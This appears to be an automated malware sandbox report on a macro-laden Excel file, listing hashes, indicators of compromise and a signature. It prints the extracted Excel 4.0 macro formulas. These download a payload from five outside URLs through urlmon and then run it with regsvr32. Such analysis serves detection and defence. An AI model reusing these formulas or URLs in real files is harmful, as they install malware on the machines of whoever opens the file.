General
-
Target
5c2a597ccae2b16252c073d4d3157ab1a38b87aa8db583f7e49399a36ddbc4f2
-
Size
91KB
-
MD5
389b9d66511df8929f33f8af5c5f156c
-
SHA1
a0c18c4045e2109d403eb371f89a103c79d24af3
-
SHA256
5c2a597ccae2b16252c073d4d3157ab1a38b87aa8db583f7e49399a36ddbc4f2
-
SHA512
50d46dc796fd8f178ee9bcc445ec35d9ca56ceb1790ca72bb3a43ee9b08cafbcdfc6ab6e874cfae1afb2e7e0c4f3b0d17e3976826a4249c3485b81abc0e539d3
-
SSDEEP
1536:xdNlX2L2nyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xX0bIS:xd32KyVEoBo6hKb4llGsQjbxXS
Malware Config
Extracted
https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/
https://dev.subs2me.com/wp-includes/EMa/
https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/
https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/
https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://oroanddentalcarecenter.com/wp-includes/0JRI2sOVpNkDhAe/","..\dw1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dev.subs2me.com/wp-includes/EMa/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://imagecarephotography.com/wp-includes/KVRvUyat0qqK0W/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://yanapiri.com/upeatv/9IZP9RfbH338pFPI/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gurmitjaswal.ca/frer-hate/LW37erwSAhgU/","..\dw1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dw1.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
5c2a597ccae2b16252c073d4d3157ab1a38b87aa8db583f7e49399a36ddbc4f2